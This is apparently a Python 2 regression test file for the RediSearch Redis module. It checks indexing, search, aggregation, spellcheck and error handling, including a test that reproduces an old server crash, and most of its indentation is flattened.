env.expect('ft.aliasUpdate', 'updateIndex', 'fake_idx')
r = env.cmd('ft.del', 'idx2', 'doc2')
env.assertEqual(1, r)
env.expect('ft.aliasdel').raiseError()
env.expect('ft.aliasdel', 'myIndex', 'yourIndex').raiseError()
env.expect('ft.aliasdel', 'non_existing_alias').raiseError()
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'schema', 'f1').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
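# FT.SPELLCHECK returns per-term correction candidates; a term with no candidates yields an
# empty suggestion list, and FULLSCOREINFO adds a leading score-info element to the reply.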
def testSpellCheck(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111')
env.assertEqual([['TERM', '111111', []]], rv)
if not env.isCluster():
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111', 'FULLSCOREINFO')
env.assertEqual([1L, ['TERM', '111111', []]], rv)
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
env.expect('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'FAKE_COMMAND', 'slang').error()
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
# We cannot reliably determine that any error will occur in cluster mode
# because of the key name
env.skipOnCluster()
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
    # this used to crash here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
    # get the maximum number of expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
    tmax = time.time() + 0.5  # 500 ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertTrue(env.isUp())
def testIssue_884(env):
env.expect('FT.create', 'idx', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
expected = [2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']]
res = env.cmd('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}')
env.assertEquals(len(expected), len(res))
for v in expected:
env.assertContains(v, res)
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc1', ['test1', 'foo'], 'doc2', ['test2', 'bar', 'test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def testIssue_779(env):
    # FT.ADD with an IF condition such as `@field < same_value` should return NOADD and leave the doc
    # unchanged, but the buggy behaviour returned OK and applied the change. Note that "greater than" (>) did not have this bug.
env.cmd('FT.CREATE idx2 SCHEMA ot1 TAG')
env.cmd('FT.ADD idx2 doc2 1.0 FIELDS newf CAT ot1 4001')
env.expect('FT.GET idx2 doc2').equal(["newf", "CAT", "ot1", "4001"])
    # NOADD is expected since 4001 is not < 4000, so no update to doc2 is expected
    env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4000 FIELDS newf DOG ot1 4000').equal('NOADD')
env.expect('FT.GET idx2 doc2').equal(["newf", "CAT", "ot1", "4001"])
# OK is expected since 4001 < 4002 and the doc2 is updated
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf DOG ot1 4002').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "DOG", "ot1", "4002"])
    # OK is NOT expected since 4002 is not < 4002.
    # We expect NOADD and no update to doc2; before the fix we got OK and doc2 was updated.
    # After the fix, @ot1 is implicitly converted to a number, so we expect NOADD.
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if to_number(@ot1)<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_str(4002) FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.GET idx2 doc2').equal(["newf", "DOG", "ot1", "4002"])
# OK and doc2 update is expected since 4002 < 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4003 FIELDS newf HORSE ot1 4003').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "HORSE", "ot1", "4003"])
# Expect NOADD since 4003 is not > 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4003 FIELDS newf COW ot1 4003').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if 4003<@ot1 FIELDS newf COW ot1 4003').equal('NOADD')
# Expect OK and doc2 updated since 4003 > 4002
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4002 FIELDS newf PIG ot1 4002').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "PIG", "ot1", "4002"])
# Syntax errors
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4-002 FIELDS newf DOG ot1 4002').contains('Syntax error')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_number(4-002) FIELDS newf DOG ot1 4002').contains('Syntax error')
def testUnknownSymbolErrorOnConditionalAdd(env):
env.expect('FT.CREATE idx SCHEMA f1 TAG f2 NUMERIC NOINDEX f3 TAG NOINDEX').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').error()
def testDelIndexExternally(env):
    env.skipOnCluster()  # todo: remove once fixed on the coordinator
env.expect('FT.CREATE idx SCHEMA num NUMERIC t TAG g GEO').equal('OK')
env.expect('ft.add idx doc1 1.0 FIELDS num 3 t my_tag g', "1,1").equal('OK')
env.expect('set nm:idx/num 1').equal('OK')
env.expect('ft.add idx doc2 1.0 FIELDS num 3').equal('Could not open numeric index for indexing')
env.expect('set tag:idx/t 1').equal('OK')
env.expect('ft.add idx doc3 1.0 FIELDS t 3').equal('Could not open tag index for indexing')
env.expect('set geo:idx/g 1').equal('OK')
env.expect('ft.add idx doc4 1.0 FIELDS g "1,1"').equal('Could not index geo value')
def testWrongResultsReturnedBySkipOptimization(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT', 'f2', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'f1', 'foo', 'f2', 'bar').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'f1', 'moo', 'f2', 'foo').equal('OK')
env.expect('ft.search', 'idx', 'foo @f2:moo').debugPrint().equal([0L])
def testErrorWithApply(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo bar').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'split()')[1]
env.assertEqual(str(err[0]), 'Invalid number of arguments for split')
def testSummerizeWithAggregateRaiseError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', '1', 'test',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0').error()
def testSummerizeHighlightParseError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', 'WITHSCORES').error()
env.expect('ft.search', 'idx', 'foo2', 'HIGHLIGHT', 'FIELDS', 'WITHSCORES').error()
def testCursorBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0',
'WITHCURSOR', 'COUNT', 'BAD').error()
def testLimitBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'LIMIT', '1').error()
def testOnTimeoutBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'bad').error()
def testAggregateSortByWrongArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', 'bad').error()
def testAggregateSortByMaxNumberOfFields(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA',
'test1', 'TEXT', 'SORTABLE',
'test2', 'TEXT', 'SORTABLE',
'test3', 'TEXT', 'SORTABLE',
'test4', 'TEXT', 'SORTABLE',
'test5', 'TEXT', 'SORTABLE',
'test6', 'TEXT', 'SORTABLE',
'test7', 'TEXT', 'SORTABLE',
'test8', 'TEXT', 'SORTABLE',
'test9', 'TEXT', 'SORTABLE'
).equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *['@test%d' % (i + 1) for i in range(9)]).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX', 'bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
def testNumericFilterError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad', '2').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', '2', 'FILTER', 'test', '0', 'bla').error()
def testGeoFilterError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', 'bad' , '2', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , 'bad', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', 'bad', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', '3', 'bad').error()
def testReducerError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as').error()
def testGroupbyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE').error()
    if not env.isCluster(): # todo: remove once fixed on the coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test1').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'bad', '0').error()
    if not env.isCluster(): # todo: remove once fixed on the coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'SUM', '1', '@test1').error()
def testGroupbyWithSort(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc3', '1.0', 'FIELDS', 'test', '2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '2', '@test', 'ASC',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as', 'count').equal([2L, ['test', '2', 'count', '1'], ['test', '1', 'count', '2']])
def testApplyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'APPLY', 'split(@test)', 'as').error()
def testLoadError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', 'bad', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', 'test').error()
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '2', '@test').error()
def testMissingArgsError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx').error()
def testUnexistsScorer(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'SCORER', 'bad').error()
def testHighlightWithUnknowsProperty(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'HIGHLIGHT', 'FIELDS', '1', 'test1').error()
def testBadFilterExpression(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', 'blabla').error()
    if not env.isCluster(): # todo: remove once fixed on the coordinator
env.expect('ft.aggregate', 'idx', '*', 'LOAD', '1', '@test', 'FILTER', '@test1 > 1').error()
def testWithSortKeysOnNoneSortableValue(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.search', 'idx', '*', 'WITHSORTKEYS', 'SORTBY', 'test').equal([1L, 'doc1', '$foo', ['test', 'foo']])
def testWithWithRawIds(env):
    env.skipOnCluster() # todo: remove once fixed on the coordinator
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT').equal('OK')
